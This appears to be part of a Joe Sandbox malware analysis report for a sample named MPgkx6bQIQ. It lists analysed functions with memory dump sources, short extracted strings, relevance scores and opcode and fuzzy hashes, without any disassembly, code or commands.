                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                                          • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                          • Instruction ID: 8cdf4942245fb07499dfcbfde2d2b629970e6a449e81b357afbaf2dd344a87d1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A314AB6920609DFDB11DF99C880AAEBBF9FF48324F15504AD841A7310D771EA49CFA4
                                                                                                                                                                                                                                                                                          Function 02484F17 Relevance: 3.3, Strings: 2, Instructions: 833COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: 0$8
                                                                                                                                                                                                                                                                                          • API String ID: 0-46163386
                                                                                                                                                                                                                                                                                          • Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                                                          • Instruction ID: f0c4bd5c9194a8ed730c7f84f1bc27d05230b103ef3380e9355d08bb5a22abd2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E27235716183409FD724DF18C880BAFBBE1AF88314F45892EF9898B391D775D948CB92
                                                                                                                                                                                                                                                                                          Function 00404CB0 Relevance: 3.3, Strings: 2, Instructions: 833COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: 0$8
                                                                                                                                                                                                                                                                                          • API String ID: 0-46163386
                                                                                                                                                                                                                                                                                          • Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                                                          • Instruction ID: d40c633f6dc63a9644a0400b392de52ca6438bdc0a59f23ad90aea60c423d6c9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC7213716087409FD714CF18C880BABBBE1EB88314F04892EF9899B391D379D948DF96
                                                                                                                                                                                                                                                                                          Function 004223B8 Relevance: 3.3, Strings: 2, Instructions: 772COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: "*B$B*B
                                                                                                                                                                                                                                                                                          • API String ID: 0-3938277345
                                                                                                                                                                                                                                                                                          • Opcode ID: 78e285193c8325869296b3d11f9fc92a1318eae965f379fbd1dbd179110fea27
                                                                                                                                                                                                                                                                                          • Instruction ID: c0ff169c622c87bee100c6609ea31c9af3570951461718032b7520edbb3c94ef
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78e285193c8325869296b3d11f9fc92a1318eae965f379fbd1dbd179110fea27
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53421276A00211DFCB18CF68DC90AAEB7B2FF49310F598179E905AB395D734AD11CB84
                                                                                                                                                                                                                                                                                          Function 00437399 Relevance: 3.0, Strings: 2, Instructions: 455COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: .$kl
                                                                                                                                                                                                                                                                                          • API String ID: 0-2631956018
                                                                                                                                                                                                                                                                                          • Opcode ID: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
                                                                                                                                                                                                                                                                                          • Instruction ID: 6e525d0f0299ed0e456b3adafb39e2bcab09d4ef44449d93680b2b5d8b67f0fb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FE1173A218709CBCB189F78EC5127A73F1FF4A741F4A887DD8818B2A1E7B99950C714
                                                                                                                                                                                                                                                                                          Function 0248ABA7 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: BE$de
                                                                                                                                                                                                                                                                                          • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                                          • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                                          • Instruction ID: a3400a792dbe62ec94cc1ff4fa32dd1f163f65084384a4d3b31ff9b3345a5ce3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BD10A7265C3644BD724EF2888516AFFBD2EFC2208F18496EE8D19B391D775C506CB82
                                                                                                                                                                                                                                                                                          Function 0040A940 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: BE$de
                                                                                                                                                                                                                                                                                          • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                                          • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                                          • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                                                                                                                                                                                          Function 024845D7 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: )$IEND
                                                                                                                                                                                                                                                                                          • API String ID: 0-707183367
                                                                                                                                                                                                                                                                                          • Opcode ID: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
                                                                                                                                                                                                                                                                                          • Instruction ID: e1816e4ec8c87f1ea5c1a08517835fdc413b418ad9c2f9b45a8b33971d1ea1ef
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66D1BFB19083459FE720EF28C840B5FBBE5AF94304F04492EF999AB381D775D948CB92
                                                                                                                                                                                                                                                                                          Function 004239F2 Relevance: 2.8, Strings: 2, Instructions: 296COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: +oQ$?{;}
                                                                                                                                                                                                                                                                                          • API String ID: 0-1414831546
                                                                                                                                                                                                                                                                                          • Opcode ID: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
                                                                                                                                                                                                                                                                                          • Instruction ID: f7e0cf01948a060ca3ae4ae96257901d3d9473cfc3be429b8585dccf822635a3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCB1BFB4E043189FEB20DF68D942B9EBBB0FB45304F1081ADE158AB381D7758946CF96
                                                                                                                                                                                                                                                                                          Function 024AB427 Relevance: 2.8, Strings: 2, Instructions: 271COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: Fg$RU]l
                                                                                                                                                                                                                                                                                          • API String ID: 0-3680832515
                                                                                                                                                                                                                                                                                          • Opcode ID: 212695677cf782d22b69bcc5005693ffe3c19f735568b368facab7bd000f874a
                                                                                                                                                                                                                                                                                          • Instruction ID: 23352fc8e9d744e6c6d5e1c93ed4da7102920fdd9c62647b41baec33340df81d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 212695677cf782d22b69bcc5005693ffe3c19f735568b368facab7bd000f874a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5771C77121D3808BE7798F25C8617EB7BD3EBE2218F18996DC0D947392DB39400ADB12
                                                                                                                                                                                                                                                                                          Function 0042B1C0 Relevance: 2.8, Strings: 2, Instructions: 271COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: Fg$RU]l
                                                                                                                                                                                                                                                                                          • API String ID: 0-3680832515
                                                                                                                                                                                                                                                                                          • Opcode ID: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
                                                                                                                                                                                                                                                                                          • Instruction ID: 6f8db59bce85ef316af4e5eced37d01641f7d5c841364d3efc2c21db6cf2a903
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2171087120D3808BE7398F25D8A57EB7BD2EBD2304F58996DC0C987392DB78440ACB56
                                                                                                                                                                                                                                                                                          Function 004256F9 Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: O28+$h
                                                                                                                                                                                                                                                                                          • API String ID: 0-657163135
                                                                                                                                                                                                                                                                                          • Opcode ID: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
                                                                                                                                                                                                                                                                                          • Instruction ID: 943cae955c8ebe7c4b26d457fd1afafbf5e793f4316e69c7cecf830d1c43eab0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B561BE32B887258BD3149A38A8901B7F791EB55350F88473EDD96873C2E63C9D09C3DA
                                                                                                                                                                                                                                                                                          Function 024BCD87 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: @$ihgf
                                                                                                                                                                                                                                                                                          • API String ID: 0-73152791
                                                                                                                                                                                                                                                                                          • Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                                          • Instruction ID: edb45b757f3296fd3e75d76d1f1fed6797a38a386dc29e24633baeaf1c52c19b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F4102B5A042018FD715CF24C8C17BBB7A6FF82318F14862EE5959B390E735A915CBA2
                                                                                                                                                                                                                                                                                          Function 0249554C Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: Z\$^P
                                                                                                                                                                                                                                                                                          • API String ID: 0-3724859648
                                                                                                                                                                                                                                                                                          • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                                          • Instruction ID: 3ed233613240f3d48e8c476488e5d4917bc9795eedf7bb8d14322ae44cdbc2e1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C41C2B1911600CFCB19CF28C891A62BBB2FF89324B16855DD49A8F765E734E842CB55
                                                                                                                                                                                                                                                                                          Function 0042750D Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: AzB$`rB
                                                                                                                                                                                                                                                                                          • API String ID: 0-365317308
                                                                                                                                                                                                                                                                                          • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                                          • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                                                                                                                                                                                          Function 00427326 Relevance: 2.5, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: AzB$`rB
                                                                                                                                                                                                                                                                                          • API String ID: 0-365317308
                                                                                                                                                                                                                                                                                          • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                                          • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                                                                                                                                                                                          Function 00417582 Relevance: 2.2, Strings: 1, Instructions: 985COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: c$
                                                                                                                                                                                                                                                                                          • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                                          • Opcode ID: 3e7173b7f35150ce67f14e4cf7677baf70ca03931a29a373c7b3ea58a15b4991
                                                                                                                                                                                                                                                                                          • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e7173b7f35150ce67f14e4cf7677baf70ca03931a29a373c7b3ea58a15b4991
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
                                                                                                                                                                                                                                                                                          Function 024B9A97 Relevance: 1.9, Strings: 1, Instructions: 681COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                                                                                          • API String ID: 0-1993550816
                                                                                                                                                                                                                                                                                          • Opcode ID: 63a83f5a27331d9fe3a04257bda5fcaf30bc217a6dc898aca3077588f1bd9e28
                                                                                                                                                                                                                                                                                          • Instruction ID: fd76e4508406a8fdf5ee9760a4cce4852087ffa567f57879faa4c9efc23ed29f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63a83f5a27331d9fe3a04257bda5fcaf30bc217a6dc898aca3077588f1bd9e28
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B22E1756083518FD719CF25C880B6BBBE2BFC9314F188A2EE59587391DB70D806CB62
                                                                                                                                                                                                                                                                                          Function 00439830 Relevance: 1.9, Strings: 1, Instructions: 681COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-1993550816
                                                                                                                                                                                                                                                                                          • Opcode ID: 5a2b71fe6b7abe8913033312b3adb200dd37ce9910002ae41400eab354b8cdfc
                                                                                                                                                                                                                                                                                          • Instruction ID: c6061003a35e321c419c30bd02a3c4e1c0b56f4f8cbc670ef9e4360bbe252bef
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a2b71fe6b7abe8913033312b3adb200dd37ce9910002ae41400eab354b8cdfc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7722EF756083518FD718CF25C880A2BBBE2BBC9314F199A2DE4D587391DBB4EC06CB46
                                                                                                                                                                                                                                                                                          Function 00415F66 Relevance: 1.9, Strings: 1, Instructions: 605COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: A67H
                                                                                                                                                                                                                                                                                          • API String ID: 0-3389657328
                                                                                                                                                                                                                                                                                          • Opcode ID: 025ab6247b28a9282489cbf8863c1f11cc422bce5e661f3cde5867652b65232c
                                                                                                                                                                                                                                                                                          • Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
